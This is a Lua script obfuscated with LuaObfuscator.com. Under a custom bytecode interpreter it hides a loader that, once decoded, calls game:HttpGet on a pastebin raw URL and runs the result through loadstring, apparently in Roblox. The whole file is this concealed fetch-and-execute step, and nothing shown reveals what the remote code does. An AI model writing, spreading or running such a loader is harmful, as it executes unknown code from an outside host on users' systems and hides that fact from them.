--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v88=0;while true do if (v88==0) then v19=v0(v3(v30,1,1));return "";end end else local v89=v2(v0(v30,16));if v19 then local v109=0;local v110;while true do if (v109==1) then return v110;end if (v109==0) then v110=v5(v89,v19);v19=nil;v109=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=0 -0 ;local v91;while true do if (v90==(0 -0)) then v91=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + 1)) ;return v91-(v91%((2565 -(1523 + 114)) -(214 + 641 + 72))) ;end end else local v92=(1 + (1 -0))^(v32-(1 + 0)) ;return (((v31%(v92 + v92))>=v92) and 1) or (877 -(282 + 595)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (12 -9) );v18=v18 + 4 ;return (v40 * (16777333 -(32 + 85))) + (v39 * 65536) + (v38 * (251 + 5)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,(1188 -(1069 + 118)) + 0 ,977 -(892 + 65) ) * (((8 -4) -2)^(58 -26))) + v41 ;local v45=v20(v42,21,31);local v46=((v20(v42,58 -26 )==(351 -((189 -102) + 263))) and  -(181 -(67 + 113))) or (1 + 0) ;if (v45==(0 -0)) then if (v44==(0 + 0)) then return v46 * ((0 + 0) -0) ;else v45=953 -(802 + 150) ;v43=0 -0 ;end elseif (v45==(3712 -1665)) then return ((v44==0) and (v46 * ((1 + 0)/(997 -(915 + 82))))) or (v46 * NaN) ;end return v8(v46,v45-(2896 -1873) ) * (v43 + (v44/(((3 -1) + 0)^(68 -16)))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -(792 -(368 + 423)) );v18=v18 + v47 ;local v49={};for v65=1, #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 0;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v102~=(0 + 0)) then else local v115=(function() return 0;end)();while true do if (0==v115) then v93=(function() return 1850 -(1409 + 441) ;end)();v94=(function() return nil;end)();v115=(function() return 1 -0 ;end)();end if (v115~=(719 -(15 + 703))) then else v102=(function() return 1 -0 ;end)();break;end end end if (v102~=1) then else while true do if (v93~=0) then else v94=(function() return v95();end)();if (v96(v94, #"}", #",")==0) then local v122=(function() return 0 -0 ;end)();local v123=(function() return;end)();local v124=(function() return;end)();local v125=(function() return;end)();local v126=(function() return;end)();while true do if (v122==0) then local v128=(function() return 0;end)();while true do if (v128==(1 + 0)) then v122=(function() return 1666 -(970 + 695) ;end)();break;end if (v128==0) then v123=(function() return 0 -0 ;end)();v124=(function() return nil;end)();v128=(function() return 439 -(262 + 176) ;end)();end end end if (v122~=(1722 -(345 + 1376))) then else local v129=(function() return 688 -(198 + 490) ;end)();while true do if (v129~=1) then else v122=(function() return 8 -6 ;end)();break;end if (v129==(0 -0)) then v125=(function() return nil;end)();v126=(function() return nil;end)();v129=(function() return 1825 -(1195 + 629) ;end)();end end end if (v122~=(2 -0)) then else while true do if (v123== #"xxx") then if (v96(v125, #"91(", #"gha")~= #"/") then else v126[ #"?id="]=(function() return v97[v126[ #"0313"]];end)();end v98[v99]=(function() return v126;end)();break;end if (v123~= #"]") then else local v167=(function() return 0;end)();while true do if ((242 -(187 + 54))==v167) then v123=(function() return 4 -2 ;end)();break;end if (v167~=(1206 -(696 + 510))) then else v126=(function() return {v100(),v100(),nil,nil};end)();if (v124==(0 + 0)) then local v179=(function() return 0 + 0 ;end)();local v180=(function() return;end)();while true do if (v179==(1262 -(1091 + 171))) then v180=(function() return 0 + 0 ;end)();while true do if (v180==(0 -0)) then v126[ #"gha"]=(function() return v100();end)();v126[ #"0313"]=(function() return v100();end)();break;end end break;end end elseif (v124== #"}") then v126[ #"xxx"]=(function() return v101();end)();elseif (v124==(6 -4)) then v126[ #"nil"]=(function() return v101() -((1638 -(1373 + 263))^(1016 -(451 + 549))) ;end)();elseif (v124== #"91(") then local v187=(function() return 374 -(123 + 251) ;end)();local v188=(function() return;end)();while true do if (v187==(0 + 0)) then v188=(function() return 0 -0 ;end)();while true do if (v188==(0 -0)) then v126[ #"xxx"]=(function() return v101() -(2^16) ;end)();v126[ #"xnxx"]=(function() return v100();end)();break;end end break;end end end v167=(function() return 699 -(208 + 490) ;end)();end end end if (v123~=(1386 -(746 + 638))) then else local v168=(function() return 0;end)();local v169=(function() return;end)();while true do if (v168~=(0 + 0)) then else v169=(function() return 0;end)();while true do if ((0 + 0)==v169) then if (v96(v125, #"{", #"\\")== #"\\") then v126[2]=(function() return v97[v126[1 + 1 ]];end)();end if (v96(v125,838 -(660 + 176) ,2)~= #".") then else v126[ #"asd"]=(function() return v97[v126[ #"gha"]];end)();end v169=(function() return 1 + 0 ;end)();end if ((203 -(14 + 188))==v169) then v123=(function() return  #"asd";end)();break;end end break;end end end if (v123==(675 -(534 + 141))) then local v170=(function() return 0 + 0 ;end)();local v171=(function() return;end)();while true do if (v170==0) then v171=(function() return 0 + 0 ;end)();while true do if (v171==(1 + 0)) then v123=(function() return  #":";end)();break;end if (v171==(560 -(306 + 254))) then v124=(function() return v96(v94,1 + 1 , #"gha");end)();v125=(function() return v96(v94, #".com",11 -5 );end)();v171=(function() return 1468 -(899 + 568) ;end)();end end break;end end end end break;end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end;end)();local v51=(function() return function(v103,v104,v105) local v106=(function() return 0;end)();while true do if (v106~=0) then else local v116=(function() return 0 -0 ;end)();while true do if (v116==(0 -0)) then v103[v104-#"!" ]=(function() return v105();end)();return v103,v104,v105;end end end end end;end)();local v52=(function() return {};end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {v52,v53,nil,v54};end)();local v56=(function() return v23();end)();local v57=(function() return {};end)();for v67= #"[",v56 do local v68=(function() return 0 -0 ;end)();local v69=(function() return;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (1==v68) then v71=(function() return nil;end)();while true do if (v69==(572 -(426 + 146))) then local v119=(function() return 0 + 0 ;end)();while true do if (v119==(0 -0)) then local v127=(function() return 0 + 0 ;end)();while true do if ((1 + 0)==v127) then v119=(function() return 1;end)();break;end if ((396 -(115 + 281))==v127) then v70=(function() return v21();end)();v71=(function() return nil;end)();v127=(function() return 2 -1 ;end)();end end end if (v119~=1) then else v69=(function() return 1 + 0 ;end)();break;end end end if (v69==(2 -1)) then if (v70== #",") then v71=(function() return v21()~=0 ;end)();elseif (v70==(1 + 1)) then v71=(function() return v24();end)();elseif (v70== #"gha") then v71=(function() return v25();end)();end v57[v67]=(function() return v71;end)();break;end end break;end if (v68~=(0 -0)) then else v69=(function() return 0;end)();v70=(function() return nil;end)();v68=(function() return 3 -2 ;end)();end end end v55[ #"gha"]=(function() return v21();end)();for v72= #" ",v23() do FlatIdent_2661B,Descriptor,v21,v20,v57,v52,v72,v22,v23=(function() return v50(FlatIdent_2661B,Descriptor,v21,v20,v57,v52,v72,v22,v23);end)();end for v73= #"!",v23() do v53,v73,v28=(function() return v51(v53,v73,v28);end)();end return v55;end local function v29(v59,v60,v61) local v62=v59[1252 -(721 + (656 -(116 + 10))) ];local v63=v59[2];local v64=v59[3];return function(...) local v74=v62;local v75=v63;local v76=v64;local v77=v27;local v78=(94 + 1178) -(945 + 326) ;local v79= -(2 -(739 -(542 + 196)));local v80={};local v81={...};local v82=v12("#",...) -(1 + 0) ;local v83={};local v84={};for v107=700 -(271 + 429) ,v82 do if (v107>=v76) then v80[v107-v76 ]=v81[v107 + 1 ];else v84[v107]=v81[v107 + 1 ];end end local v85=(v82-v76) + 1 ;local v86;local v87;while true do local v108=0;while true do if ((v108==(1 + 0)) or (2689<=343)) then if ((v87<=7) or (1869==2009)) then if (v87<=(1503 -(1408 + 92))) then if ((v87<=(1087 -(461 + 625))) or (3546<2322)) then if (v87>(1288 -((2128 -1135) + 295))) then v84[v86[1 + 0 + 1 ]]={};else v84[v86[1173 -(418 + 753) ]]=v86[2 + 1 + 0 ];end elseif (v87>(1 + 1)) then local v133=v86[1 + 1 ];local v134=v84[v86[1 + 2 ]];v84[v133 + (530 -(406 + 123)) ]=v134;v84[v133]=v134[v86[1773 -(1749 + 20) ]];else v84[v86[1 + 1 ]]=v61[v86[3]];end elseif ((v87<=(2 + 3)) or (2082==4773)) then if (v87>(1326 -(1249 + 73))) then do return;end else local v140=v86[1 + 1 ];local v141=v84[v86[3]];v84[v140 + (1146 -(466 + (1788 -1109))) ]=v141;v84[v140]=v141[v86[9 -5 ]];end elseif ((3244>1055) and (v87>(14 -8))) then local v145=v86[5 -3 ];v84[v145]=v84[v145](v13(v84,v145 + (1901 -(106 + 1794)) ,v79));else v84[v86[1 + 1 ]]=v61[v86[1 + (1553 -(1126 + 425)) ]];end elseif (v87<=((437 -(118 + 287)) -21)) then if (v87<=(24 -15)) then if (v87>(122 -(4 + 110))) then v84[v86[586 -(57 + 527) ]]();else v84[v86[(5600 -4171) -(41 + 1386) ]]=v86[106 -((1138 -(118 + 1003)) + 86) ];end elseif (v87==(7 + 3)) then local v151=0 -(0 -0) ;local v152;while true do if (v151==(0 -0)) then v152=v86[168 -(122 + 44) ];v84[v152]=v84[v152](v13(v84,v152 + (1 -0) ,v79));break;end end else local v153=v86[2];local v154,v155=v77(v84[v153](v13(v84,v153 + (3 -2) ,v86[3 + 0 ])));v79=(v155 + v153) -(1 + 0) ;local v156=0 -0 ;for v163=v153,v79 do v156=v156 + ((443 -(142 + 235)) -((136 -106) + 35)) ;v84[v163]=v154[v156];end end elseif ((v87<=(2 + 7 + 4)) or (3313<=1778)) then if ((v87>(1269 -(1043 + 214))) or (1421>=2104)) then v84[v86[7 -5 ]]();else local v157=(2189 -(553 + 424)) -(323 + 889) ;local v158;local v159;local v160;local v161;while true do if ((1812<=3249) and (v157==(0 -0))) then v158=v86[2];v159,v160=v77(v84[v158](v13(v84,v158 + (581 -(361 + (413 -194))) ,v86[(285 + 38) -(53 + 267) ])));v157=1 + 0 ;end if (v157==1) then v79=(v160 + v158) -1 ;v161=0;v157=415 -(15 + 0 + 398) ;end if ((1623<=1957) and (v157==2)) then for v175=v158,v79 do v161=v161 + 1 ;v84[v175]=v159[v161];end break;end end end elseif (v87>(996 -(18 + 964))) then do return;end else v84[v86[7 -(3 + 2) ]]={};end v78=v78 + 1 + 0 ;break;end if (v108==(0 + 0)) then v86=v74[v78];v87=v86[851 -(20 + 830) ];v108=1 + 0 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F695A68555838436D00094Q00017Q001202000100013Q001202000200023Q00200400020002000300122Q000400044Q000B000200044Q000A00013Q00022Q00090001000100012Q000F3Q00017Q00",v9(),...);
